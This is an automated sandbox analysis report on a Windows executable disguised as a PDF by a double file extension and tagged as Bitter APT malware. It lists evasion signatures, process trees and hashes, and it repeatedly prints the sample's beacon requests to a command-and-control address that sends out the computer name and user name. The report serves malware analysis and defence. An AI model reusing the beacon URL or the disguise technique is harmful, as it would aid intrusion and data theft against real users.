Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Minutes_of_15th_Session_of_PSC.pdf.exe

Overview

General Information

Sample name:Minutes_of_15th_Session_of_PSC.pdf.exe
Analysis ID:1431476
MD5:a51493ca2948491e60759223c3be8502
SHA1:87c1d51cea91b80dd236b1f2ef12d78867ece1ca
SHA256:dcdae583da8a1b01a8ad0caef6a7f6f3b6f1eb6dd3298ac7d904200f52712446
Tags:aptBitterexe
Infos:

Detection

Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Icon mismatch, binary includes an icon from a different legit application in order to fool users
Multi AV Scanner detection for submitted file
Sigma detected: Suspicious Double Extension File Execution
Initial sample is a PE file and has a suspicious name
Uses an obfuscated file name to hide its real file extension (double extension)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info

Classification

  • System is w10x64
  • Minutes_of_15th_Session_of_PSC.pdf.exe (PID: 7048 cmdline: "C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exe" MD5: A51493CA2948491E60759223C3BE8502)
    • cmd.exe (PID: 7148 cmdline: "cmd.exe" /c C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Minutes_of_15th_Session_of_PSC.pdf.exe (PID: 6464 cmdline: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf MD5: A51493CA2948491E60759223C3BE8502)
        • cmd.exe (PID: 1928 cmdline: "cmd.exe" /c C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 4304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exe", CommandLine: "C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exe, NewProcessName: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exe, OriginalFileName: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exe", ProcessId: 7048, ProcessName: Minutes_of_15th_Session_of_PSC.pdf.exe
No Snort rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: Minutes_of_15th_Session_of_PSC.pdf.exeVirustotal: Detection: 11%Perma Link
Source: unknownHTTPS traffic detected: 188.241.39.200:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.241.39.200:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.241.39.200:443 -> 192.168.2.4:49755 version: TLS 1.2
Source: Minutes_of_15th_Session_of_PSC.pdf.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: global trafficHTTP traffic detected: GET /log.php?computername=715575&username=user HTTP/1.1Host: oraclewebonline.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /log.php?computername=715575&username=user HTTP/1.1Host: oraclewebonline.com
Source: global trafficHTTP traffic detected: GET /log.php?computername=715575&username=user HTTP/1.1Host: oraclewebonline.com
Source: global trafficHTTP traffic detected: GET /log.php?computername=715575&username=user HTTP/1.1Host: oraclewebonline.com
Source: global trafficHTTP traffic detected: GET /log.php?computername=715575&username=user HTTP/1.1Host: oraclewebonline.com
Source: global trafficHTTP traffic detected: GET /log.php?computername=715575&username=user HTTP/1.1Host: oraclewebonline.com
Source: global trafficHTTP traffic detected: GET /log.php?computername=715575&username=user HTTP/1.1Host: oraclewebonline.com
Source: global trafficHTTP traffic detected: GET /log.php?computername=715575&username=user HTTP/1.1Host: oraclewebonline.com
Source: global trafficHTTP traffic detected: GET /log.php?computername=715575&username=user HTTP/1.1Host: oraclewebonline.com
Source: global trafficHTTP traffic detected: GET /log.php?computername=715575&username=user HTTP/1.1Host: oraclewebonline.com
Source: global trafficHTTP traffic detected: GET /log.php?computername=715575&username=user HTTP/1.1Host: oraclewebonline.com
Source: global trafficHTTP traffic detected: GET /log.php?computername=715575&username=user HTTP/1.1Host: oraclewebonline.com
Source: global trafficHTTP traffic detected: GET /log.php?computername=715575&username=user HTTP/1.1Host: oraclewebonline.com
Source: global trafficHTTP traffic detected: GET /log.php?computername=715575&username=user HTTP/1.1Host: oraclewebonline.com
Source: global trafficHTTP traffic detected: GET /log.php?computername=715575&username=user HTTP/1.1Host: oraclewebonline.com
Source: global trafficHTTP traffic detected: GET /log.php?computername=715575&username=user HTTP/1.1Host: oraclewebonline.com
Source: global trafficHTTP traffic detected: GET /log.php?computername=715575&username=user HTTP/1.1Host: oraclewebonline.com
Source: global trafficHTTP traffic detected: GET /log.php?computername=715575&username=user HTTP/1.1Host: oraclewebonline.com
Source: global trafficHTTP traffic detected: GET /log.php?computername=715575&username=user HTTP/1.1Host: oraclewebonline.com
Source: global trafficHTTP traffic detected: GET /log.php?computername=715575&username=user HTTP/1.1Host: oraclewebonline.com
Source: global trafficHTTP traffic detected: GET /log.php?computername=715575&username=user HTTP/1.1Host: oraclewebonline.com
Source: Joe Sandbox ViewIP Address: 188.241.39.200 188.241.39.200
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /log.php?computername=715575&username=user HTTP/1.1Host: oraclewebonline.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /log.php?computername=715575&username=user HTTP/1.1Host: oraclewebonline.com
Source: global trafficHTTP traffic detected: GET /log.php?computername=715575&username=user HTTP/1.1Host: oraclewebonline.com
Source: global trafficHTTP traffic detected: GET /log.php?computername=715575&username=user HTTP/1.1Host: oraclewebonline.com
Source: global trafficHTTP traffic detected: GET /log.php?computername=715575&username=user HTTP/1.1Host: oraclewebonline.com
Source: global trafficHTTP traffic detected: GET /log.php?computername=715575&username=user HTTP/1.1Host: oraclewebonline.com
Source: global trafficHTTP traffic detected: GET /log.php?computername=715575&username=user HTTP/1.1Host: oraclewebonline.com
Source: global trafficHTTP traffic detected: GET /log.php?computername=715575&username=user HTTP/1.1Host: oraclewebonline.com
Source: global trafficHTTP traffic detected: GET /log.php?computername=715575&username=user HTTP/1.1Host: oraclewebonline.com
Source: global trafficHTTP traffic detected: GET /log.php?computername=715575&username=user HTTP/1.1Host: oraclewebonline.com
Source: global trafficHTTP traffic detected: GET /log.php?computername=715575&username=user HTTP/1.1Host: oraclewebonline.com
Source: global trafficHTTP traffic detected: GET /log.php?computername=715575&username=user HTTP/1.1Host: oraclewebonline.com
Source: global trafficHTTP traffic detected: GET /log.php?computername=715575&username=user HTTP/1.1Host: oraclewebonline.com
Source: global trafficHTTP traffic detected: GET /log.php?computername=715575&username=user HTTP/1.1Host: oraclewebonline.com
Source: global trafficHTTP traffic detected: GET /log.php?computername=715575&username=user HTTP/1.1Host: oraclewebonline.com
Source: global trafficHTTP traffic detected: GET /log.php?computername=715575&username=user HTTP/1.1Host: oraclewebonline.com
Source: global trafficHTTP traffic detected: GET /log.php?computername=715575&username=user HTTP/1.1Host: oraclewebonline.com
Source: global trafficHTTP traffic detected: GET /log.php?computername=715575&username=user HTTP/1.1Host: oraclewebonline.com
Source: global trafficHTTP traffic detected: GET /log.php?computername=715575&username=user HTTP/1.1Host: oraclewebonline.com
Source: global trafficHTTP traffic detected: GET /log.php?computername=715575&username=user HTTP/1.1Host: oraclewebonline.com
Source: global trafficHTTP traffic detected: GET /log.php?computername=715575&username=user HTTP/1.1Host: oraclewebonline.com
Source: global trafficDNS traffic detected: DNS query: oraclewebonline.com
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 25 Apr 2024 07:22:36 GMTServer: ApacheConnection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 25 Apr 2024 07:22:47 GMTServer: ApacheConnection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 25 Apr 2024 07:22:49 GMTServer: ApacheConnection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 25 Apr 2024 07:22:56 GMTServer: ApacheConnection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 25 Apr 2024 07:23:11 GMTServer: ApacheConnection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 25 Apr 2024 07:23:15 GMTServer: ApacheConnection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 25 Apr 2024 07:23:18 GMTServer: ApacheConnection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 25 Apr 2024 07:23:28 GMTServer: ApacheConnection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 25 Apr 2024 07:23:39 GMTServer: ApacheConnection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 25 Apr 2024 07:23:49 GMTServer: ApacheConnection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 25 Apr 2024 07:23:51 GMTServer: ApacheConnection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 25 Apr 2024 07:23:53 GMTServer: ApacheConnection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 25 Apr 2024 07:23:56 GMTServer: ApacheConnection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 25 Apr 2024 07:24:05 GMTServer: ApacheConnection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 25 Apr 2024 07:24:14 GMTServer: ApacheConnection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 25 Apr 2024 07:24:26 GMTServer: ApacheConnection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 25 Apr 2024 07:24:29 GMTServer: ApacheConnection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 25 Apr 2024 07:24:30 GMTServer: ApacheConnection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 25 Apr 2024 07:24:43 GMTServer: ApacheConnection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 25 Apr 2024 07:25:01 GMTServer: ApacheConnection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
Source: Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.00000000032C9000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.00000000033B6000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.00000000032B3000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.00000000033AA000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.00000000032BA000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.00000000032D1000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.0000000003399000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.00000000031F9000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.00000000032DD000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.0000000003301000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.0000000003288000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.000000000323A000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.00000000032A6000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.0000000003391000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://oraclewebonline.com
Source: Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.00000000032C9000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.00000000033B6000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.00000000032B3000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.00000000033AA000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.00000000032BA000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.00000000032D1000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.0000000003399000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.00000000031F9000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.00000000032DD000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.0000000003301000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.0000000003288000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.000000000323A000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.00000000032A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://oraclewebonline.comd
Source: Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.000000000317C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.000000000317C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oraclewebonline.com
Source: Minutes_of_15th_Session_of_PSC.pdf.exeString found in binary or memory: https://oraclewebonline.com/log.php
Source: Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.0000000003222000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.00000000032A1000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.00000000033B6000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.00000000032E5000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.00000000032B3000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.00000000033AA000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.00000000032D1000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.0000000003399000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.000000000317C000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.0000000003301000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.0000000003288000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.000000000323A000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.0000000003391000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oraclewebonline.com/log.php?computername=715575&username=user
Source: Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.0000000003222000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.00000000032A1000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.00000000033B6000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.00000000032E5000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.00000000032B3000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.00000000033AA000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.00000000032D1000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.0000000003399000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.000000000317C000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.0000000003301000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.0000000003288000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.000000000323A000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.0000000003391000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oraclewebonline.com/log.php?computername=715575&username=usert
Source: Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.00000000032C9000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.00000000033B6000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.00000000032E5000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.00000000032B3000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.00000000033AA000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.00000000032BA000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.00000000032D1000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.0000000003399000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.00000000032DD000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.000000000317C000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.0000000003288000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.00000000032A6000.00000004.00000800.00020000.00000000.sdmp, Minutes_of_15th_Session_of_PSC.pdf.exe, 00000003.00000002.4110027405.0000000003391000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oraclewebonline.comD
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownHTTPS traffic detected: 188.241.39.200:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.241.39.200:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.241.39.200:443 -> 192.168.2.4:49755 version: TLS 1.2

System Summary

barindex
Source: initial sampleStatic PE information: Filename: Minutes_of_15th_Session_of_PSC.pdf.exe
Source: Minutes_of_15th_Session_of_PSC.pdf.exe, 00000000.00000002.4108552790.000000000138E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Minutes_of_15th_Session_of_PSC.pdf.exe
Source: Minutes_of_15th_Session_of_PSC.pdf.exe, 00000000.00000000.1642336004.0000000000F32000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamerest.exe* vs Minutes_of_15th_Session_of_PSC.pdf.exe
Source: Minutes_of_15th_Session_of_PSC.pdf.exeBinary or memory string: OriginalFilenamerest.exe* vs Minutes_of_15th_Session_of_PSC.pdf.exe
Source: classification engineClassification label: mal72.evad.winEXE@9/0@1/1
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4304:120:WilError_03
Source: Minutes_of_15th_Session_of_PSC.pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Minutes_of_15th_Session_of_PSC.pdf.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: Minutes_of_15th_Session_of_PSC.pdf.exeVirustotal: Detection: 11%
Source: unknownProcess created: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exe "C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exe"
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exe C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdfJump to behavior
